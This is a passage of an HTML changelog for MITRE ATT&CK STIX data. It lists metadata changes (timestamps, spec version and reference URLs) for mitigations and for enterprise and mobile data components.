black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-25 14:39:13.833000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.730000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[M0807] Network Allowlists</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 00:56:32.131000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.731000+00:00</td></tr></tbody></table></details><hr><h4>[M0931] Network Intrusion Prevention</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 00:47:04.457000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.730000+00:00</td></tr></tbody></table></details><hr><h4>[M0930] Network Segmentation</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 00:46:09.190000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.730000+00:00</td></tr></tbody></table></details><hr><h4>[M0810] Out-of-Band Communications Channel</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 00:56:53.267000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.731000+00:00</td></tr></tbody></table></details><hr><h4>[M0927] Password Policies</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-16 21:26:28.470000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.730000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[M0922] Restrict File and Directory Permissions</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 00:57:09.061000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.731000+00:00</td></tr></tbody></table></details><hr><h4>[M0813] Software Process and Device Authentication</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 00:55:20.765000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.731000+00:00</td></tr></tbody></table></details><hr><h4>[M0814] Static Network Configuration</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 00:50:32.432000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.730000+00:00</td></tr></tbody></table></details></details><h2>Data Components</h2><h3>enterprise-attack</h3><details><summary>Patches</summary><hr><h4>[DC0038] Application Log Content</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 19:46:47.171000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.776000+00:00</td></tr></tbody></table></details><hr><h4>[DC0083] Cloud Service Enumeration</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-02-23 19:38:20.657000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.775000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>external_references[0]['url']</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/data-components/DC0083</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/datacomponents/DC0083</td></tr></tbody></table></details><hr><h4>[DC0064] Command Execution</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 19:47:16.123000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.774000+00:00</td></tr></tbody></table></details><hr><h4>[DC0074] Driver Metadata</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 17:02:15.878000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.779000+00:00</td></tr></tbody></table></details><hr><h4>[DC0055] File Access</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 18:39:07.536000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.770000+00:00</td></tr></tbody></table></details><hr><h4>[DC0039] File Creation</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 17:17:05.280000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.770000+00:00</td></tr></tbody></table></details><hr><h4>[DC0040] File Deletion</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 18:19:16.114000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.778000+00:00</td></tr></tbody></table></details><hr><h4>[DC0059] File Metadata</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 18:33:47.956000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.774000+00:00</td></tr></tbody></table></details><hr><h4>[DC0061] File Modification</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 16:41:53.549000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.775000+00:00</td></tr></tbody></table></details><hr><h4>[DC0099] Group Enumeration</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-13 22:21:38.311000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.775000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>external_references[0]['url']</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/data-components/DC0099</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/datacomponents/DC0099</td></tr></tbody></table></details><hr><h4>[DC0018] Host Status</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-20 18:17:23.974000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.775000+00:00</td></tr></tbody></table></details><hr><h4>[DC0073] Instance Modification</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 17:07:21.897000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.773000+00:00</td></tr></tbody></table></details><hr><h4>[DC0016] Module Load</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-01-29 17:21:27.873000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.778000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>external_references[0]['url']</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/data-components/DC0016</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/datacomponents/DC0016</td></tr></tbody></table></details><hr><h4>[DC0082] Network Connection Creation</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 18:37:33.992000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.770000+00:00</td></tr></tbody></table></details><hr><h4>[DC0085] Network Traffic Content</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 14:48:50.367000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.771000+00:00</td></tr></tbody></table></details><hr><h4>[DC0078] Network Traffic Flow</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-09 17:32:30.362000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.777000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>external_references[0]['url']</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/data-components/DC0078</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/datacomponents/DC0078</td></tr></tbody></table></details><hr><h4>[DC0021] OS API Execution</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 18:22:40.476000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.775000+00:00</td></tr></tbody></table></details><hr><h4>[DC0035] Process Access</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-02-23 18:45:08.713000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.770000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>external_references[0]['url']</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/data-components/DC0035</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/datacomponents/DC0035</td></tr></tbody></table></details><hr><h4>[DC0032] Process Creation</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-13 15:49:16.424000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.773000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>external_references[0]['url']</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/data-components/DC0032</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/datacomponents/DC0032</td></tr></tbody></table></details><hr><h4>[DC0034] Process Metadata</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 17:01:33.771000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.778000+00:00</td></tr></tbody></table></details><hr><h4>[DC0001] Scheduled Job Creation</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-09 17:05:23.355000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.778000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>external_references[0]['url']</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/data-components/DC0001</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/datacomponents/DC0001</td></tr></tbody></table></details><hr><h4>[DC0041] Service Metadata</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 16:59:19.254000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.774000+00:00</td></tr></tbody></table></details><hr><h4>[DC0065] Service Modification</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-20 18:21:23.994000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.774000+00:00</td></tr></tbody></table></details><hr><h4>[DC0002] User Account Authentication</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 19:47:33.610000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.777000+00:00</td></tr></tbody></table></details><hr><h4>[DC0013] User Account Metadata</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-13 22:24:06.660000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.778000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>external_references[0]['url']</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/data-components/DC0013</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/datacomponents/DC0013</td></tr></tbody></table></details><hr><h4>[DC0063] Windows Registry Key Modification</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-13 23:12:09.029000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.778000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>external_references[0]['url']</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/data-components/DC0063</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/datacomponents/DC0063</td></tr></tbody></table></details></details><h3>mobile-attack</h3><details><summary>Patches</summary><hr><h4>[DC0112] API Calls</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-01-16 16:18:01.897000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.773000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>external_references[0]['url']</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/data-components/DC0112</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/datacomponents/DC0112</td></tr></tbody></table></details><hr><h4>[DC0119] Application Assets</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-11 15:49:22.334000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.773000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>external_references[0]['url']</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/data-components/DC0119</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/datacomponents/DC0119</td></tr></tbody></table></details><hr><h4>[DC0038] Application Log Content</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 19:46:47.171000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.776000+00:00</td></tr></tbody></table></details><hr><h4>[DC0114] Application Permission</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 18:21:10.349000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.778000+00:00</td></tr></tbody></table></details><hr><h4>[DC0123] Application State</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:49:00.264000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.773000+00:00</td></tr></tbody></table></details><hr><h4>[DC0083] Cloud Service Enumeration</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New 